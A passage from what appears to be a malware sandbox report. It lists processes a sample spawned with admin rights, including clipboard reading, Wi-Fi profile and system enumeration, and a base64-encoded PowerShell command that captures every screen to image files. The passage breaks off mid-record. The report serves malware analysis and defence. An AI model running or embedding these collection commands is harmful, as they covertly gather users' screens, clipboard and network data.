                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c6d10000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c6d10000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7182c0000
                                                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                                                                                  Start time:01:19:24
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                                  Imagebase:0x7ff67c6c0000
                                                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                                                  Start time:01:19:25
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                                                  Start time:01:19:26
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b1ef0000
                                                                                                                                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                                                  Start time:01:19:27
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
